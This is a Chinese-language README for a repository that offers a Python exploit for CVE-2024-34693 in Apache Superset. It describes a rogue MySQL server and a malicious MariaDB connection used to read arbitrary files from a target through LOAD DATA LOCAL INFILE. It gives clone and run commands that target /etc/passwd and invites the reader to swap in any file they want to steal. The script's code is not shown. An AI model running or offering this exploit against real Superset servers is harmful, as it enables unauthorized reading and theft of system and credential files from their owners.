此仓库包含一个用于利用 Apache Superset 中 CVE-2024-34693 漏洞的复杂 Python 脚本。该脚本设置一个恶意 MySQL 服务器,并创建恶意 MariaDB 连接,以从目标系统中窃取指定文件的内容。
![[Screenshot_1.png]](https://raw.githubusercontent.com/Mr-r00t11/CVE-2024-34693/main/img/Screenshot_1.png)
CVE-2024-34693 漏洞允许能够创建任意数据库连接的攻击者执行 LOAD DATA LOCAL INFILE 攻击,从而读取目标系统上的任意文件。
git clone https://github.com/Mr-r00t11/CVE-2024-34693-exploit.git
cd CVE-2024-34693-exploit
使用适当的参数运行漏洞利用脚本:
python3 exploit_cve_2024_34693.py http://localhost:8088 /etc/passwd
将 http://localhost:8088 替换为你的 Apache Superset 实例的 URL,将 /etc/passwd 替换为你想要窃取的文件路径。